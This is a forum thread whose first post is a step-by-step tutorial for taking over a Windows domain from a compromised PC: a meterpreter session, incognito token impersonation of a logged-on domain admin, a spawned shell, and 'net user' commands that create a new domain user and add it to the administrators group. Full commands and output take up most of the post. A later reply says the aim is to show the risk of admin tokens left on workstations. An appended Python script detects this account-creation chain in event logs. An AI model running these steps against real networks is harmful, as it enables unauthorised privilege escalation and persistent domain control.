
Thread: How to create a domain user admin thru an exploited domain PC

  1. #1

    Default How to create a domain user admin thru an exploited domain PC

    Hi all!
    The "How To" forum is closed, so I post here.

    This is how to create a domain admin user through an exploited domain PC on which we have local machine administration rights.

    The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
    The exploited machine is joined to the domain and we got a meterpreter shell with local PC admin rights.

    Basic commands used after the exploit:
    Find processes --> ps
    Load the incognito extension --> use incognito
    List available tokens --> list_tokens -u
    Impersonate a token --> impersonate_token <token>
    Get a command shell using the token --> execute -f cmd.exe -i -t -H -c
    Add a domain user --> net user USER PASSWORD /add /domain
    Add the created user to the domain administrators --> net localgroup administrators USER /add /domain

    Interact with session 1 and list processes:
    Code:
    msf exploit(psexec) > sessions -i 1
    [*] Starting interaction with 1...
    
    meterpreter > ps
    
    Process list
    ============
    
     PID   Name              Arch  Session  User                           Path
     ---   ----              ----  -------  ----                           ----
     0     [System Process]
     4     System            x86   0        NT AUTHORITY\SYSTEM
     1736  smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
     1788  csrss.exe         x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
     1812  winlogon.exe      x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
     1856  services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
     1868  lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
     2032  ibmpmsvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\ibmpmsvc.exe
     176   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
     312   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
     404   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
     508   EvtEng.exe        x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
     604   S24EvMon.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
     824   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
     848   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
     1228  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
     1304  svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
     1344  AcPrfMgrSvc.exe   x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
     1416  btwdins.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\Bluetooth Software\bin\btwdins.exe
     1484  RegSrvc.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
     1676  TpKmpSvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\TpKmpSVC.exe
     180   AcSvc.exe         x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcSvc.exe
     700   MOMService.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Microsoft Forefront\Client Security\Client\Microsoft Operations Manager 2005\MOMService.exe
     224   wmiprvse.exe      x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\wbem\wmiprvse.exe
     948   SvcGuiHlpr.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
     2580  alg.exe           x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\System32\alg.exe
     3276  explorer.exe      x86   0        LAB\utente1                    C:\WINDOWS\Explorer.EXE
     3908  tp4mon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\tp4mon.exe
     1112  igfxtray.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxtray.exe
     1124  hkcmd.exe         x86   0        LAB\utente1                    C:\WINDOWS\system32\hkcmd.exe
     2192  igfxpers.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxpers.exe
     1860  ACTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACTray.exe
     2596  ACWLIcon.exe      x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACWLIcon.exe
     2700  smax4pnp.exe      x86   0        LAB\utente1                    C:\Programmi\Analog Devices\Core\smax4pnp.exe
     2904  ctfmon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\ctfmon.exe
     3076  BTTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\Bluetooth Software\BTTray.exe
     3572  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
     2912  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
     1472  rundll32.exe      x86   0        LAB\admin                 C:\WINDOWS\system32\rundll32.exe                           <---------- Look at these
     1256  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
     3044  msiexec.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\msiexec.exe
     3224  rundll32.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\rundll32.exe
    Load the extension, list the tokens and impersonate the domain admin:
    Code:
    meterpreter > use incognito
    Loading extension incognito...success.
    meterpreter > list_tokens -u
    
    Delegation Tokens Available
    ========================================
    LAB\admin
    LAB\utente1
    NT AUTHORITY\SERVIZIO DI RETE
    NT AUTHORITY\SERVIZIO LOCALE
    NT AUTHORITY\SYSTEM
    
    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\ACCESSO ANONIMO
    
    meterpreter > impersonate_token lab\\admin          <---------- Double backslash DOMAIN\\name 
    [+] Delegation token available
    [+] Successfully impersonated user LAB\admin
    
    meterpreter > getuid
    Server username: lab\admin
    Get a domain admin shell:
    Code:
    meterpreter > execute -f cmd.exe -i -t -H -c
    Process 3804 created.
    Channel 1 created.
    Microsoft Windows XP [Versione 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    
    C:\WINDOWS\system32>
    Create a new domain user and add it to the domain administrators group:
    Code:
    C:\WINDOWS\system32>net user TestUser Passw0rd /add /domain
    net user TestUser Passw0rd /add /domain
    La richiesta verrā elaborata dal controller di dominio per il dominio lab.local.
    
    Esecuzione comando riuscita.
    
    
    C:\WINDOWS\system32>net localgroup /domain
    net localgroup /domain
    La richiesta verrā elaborata dal controller di dominio per il dominio lab.local.
    
    
    Alias per \\LABServer07.lab.local
    
    -------------------------------------------------------------------------------
    *Accesso compatibile precedente a Windows 2000
    *Accesso DCOM a Servizi certificati
    *Account Operators
    *Administrators
    *Backup Operators
    *Cert Publishers
    *Cryptographic Operators
    *Distributed COM Users
    *DnsAdmins
    *Gruppo di accesso autorizzazione Windows
    *Guests
    *IIS_IUSRS
    *Incoming Forest Trust Builders
    *Lettori registri eventi
    *Network Configuration Operators
    *Ogg. autorizzati a replica passw. in controller sola lettura
    *Ogg. non autoriz. a replica passw. in controller sola lettura
    *Performance Log Users
    *Performance Monitor Users
    *Print Operators
    *Replicator
    *Server licenze di Terminal Server
    *Server Operators
    *Server RAS e IAS
    *Users
    *Utenti desktop remoto
    Esecuzione comando riuscita.
    
    C:\WINDOWS\system32>net localgroup administrators TestUser /add /domain
    net localgroup administrators TestUser /add /domain
    La richiesta verrā elaborata dal controller di dominio per il dominio lab.local.
    
    Esecuzione comando riuscita.
    Obviously the victim PC runs an Italian version of Windows, so where you read "Esecuzione comando riuscita" you have to read "Command completed successfully".
    Thanks to all.

  2. #2

    Question Re: How to create a domain user admin thru an exploited domain PC

    Great job!
    ===========================
    You're lucky, baby!

    If you have only a normal domain user and a local administrator, what will you do?

    What I mean is that there are no domain admins logged on to the PC you've hacked.

  3. #3

    Default Re: How to create a domain user admin thru an exploited domain PC

    This is the purpose of the tutorial: to illustrate the risk of using a domain admin user to run processes remotely in a domain, such as policies or scripts. If there is no such token, "you can't" create a domain user.
    Last edited by SilicaG; 07-03-2012 at 08:27 AM.
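    The chain shown in the first post (a fresh account created, then added to an administrators group minutes later by a domain admin whose token was left on a workstation, the risk the last reply names) leaves a recognisable trace in the domain controller's Security log. The detection below is an added example, not code from the thread; the event records, host names and the simplified field layout (Windows 4720 / 4728 / 4732 events) are constructed sample data.

    ```python
    """Flag 'create account, then add it to a privileged group' chains
    in Windows Security events (4720 followed by 4728/4732).

    Added example, not part of the forum post. Event records and
    names are constructed sample data with simplified fields.
    """
    from datetime import datetime, timedelta

    # 4720 = user account created; 4728 = member added to a security-enabled
    # global group (e.g. Domain Admins); 4732 = member added to a
    # security-enabled local group (e.g. the DC's built-in Administrators).
    CREATE = 4720
    ADD_TO_GROUP = {4728, 4732}
    PRIVILEGED_GROUPS = {"Domain Admins", "Administrators", "Enterprise Admins"}

    # Constructed sample events, roughly as the DC would log them.
    SAMPLE_EVENTS = [
        {"time": "2012-07-03 08:10:05", "id": 4624, "subject": "LAB\\utente1", "target": "LAB\\utente1", "group": None},
        {"time": "2012-07-03 08:12:41", "id": 4720, "subject": "LAB\\admin", "target": "LAB\\TestUser", "group": None},
        {"time": "2012-07-03 08:13:02", "id": 4732, "subject": "LAB\\admin", "target": "LAB\\TestUser", "group": "Administrators"},
        {"time": "2012-07-03 09:30:00", "id": 4720, "subject": "LAB\\admin", "target": "LAB\\svc_backup", "group": None},
    ]

    def parse_time(s):
        return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

    def find_privileged_account_chains(events, window_minutes=10):
        """Return (account, group, creator) for every account that was added
        to a privileged group within window_minutes of being created."""
        created = {}   # target account -> (creation time, creating subject)
        hits = []
        for ev in sorted(events, key=lambda e: parse_time(e["time"])):
            t = parse_time(ev["time"])
            if ev["id"] == CREATE:
                created[ev["target"]] = (t, ev["subject"])
            elif ev["id"] in ADD_TO_GROUP and ev["group"] in PRIVILEGED_GROUPS:
                if ev["target"] in created:
                    t0, creator = created[ev["target"]]
                    if t - t0 <= timedelta(minutes=window_minutes):
                        hits.append((ev["target"], ev["group"], creator))
        return hits

    if __name__ == "__main__":
        for acct, group, creator in find_privileged_account_chains(SAMPLE_EVENTS):
            print(f"ALERT: {acct} created by {creator} and added to {group} within minutes")
    ```

    The account created at 09:30 is not flagged because no group addition follows it inside the window; pairing this alert with the creator's logon host shows whether the change came from a workstation rather than an admin host.
    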
